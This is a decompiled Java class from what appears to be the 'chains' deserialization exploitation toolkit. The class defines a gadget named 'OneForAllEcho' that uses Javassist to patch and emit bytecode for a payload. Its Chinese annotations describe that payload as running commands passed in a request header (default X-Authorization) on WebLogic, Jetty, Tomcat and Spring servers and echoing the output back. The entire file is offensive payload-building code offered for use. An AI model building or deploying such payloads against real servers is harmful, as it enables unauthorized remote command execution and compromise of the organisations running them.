package com.ar3h.chains.gadget.impl.bytecode.echo;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.JavassistHelper;
import com.ar3h.chains.gadget.impl.bytecode.echo.template.OneForAllEchoBytecode;
import com.formdev.flatlaf.FlatClientProperties;

@GadgetAnnotation(name = "One For All Echo 回显", description = "一个 Payload 包含了一些常见中间件的回显：WebLogic、Jetty、Tomcat、Spring", authors = {Authors._4ra1n}, priority = 10)
@GadgetTags(tags = {Tag.Bytecode, Tag.Echo, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/bytecode/echo/OneForAllEcho.class */
public class OneForAllEcho implements Gadget {

    @Param(name = "请求头key", description = "执行命令的Header头")
    public String header = "X-Authorization";

    @Param(name = "打印调试信息", description = "是否在目标命令行打印调试信息")
    public boolean debug = false;

    @Param(name = "成功后返回", description = "是否成功回显一次后就不再尝试后续步骤")
    public boolean once = false;

    public byte[] getObject() throws Exception {
        JavassistHelper javassistHelper = new JavassistHelper(OneForAllEchoBytecode.class);
        javassistHelper.modifyStringField("header", this.header);
        javassistHelper.modifyBooleanField("debug", this.debug);
        javassistHelper.modifyBooleanField(FlatClientProperties.SELECT_ALL_ON_FOCUS_POLICY_ONCE, this.once);
        return javassistHelper.getBytecode();
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetChain.doCreate(gadgetContext);
        return getObject();
    }
}
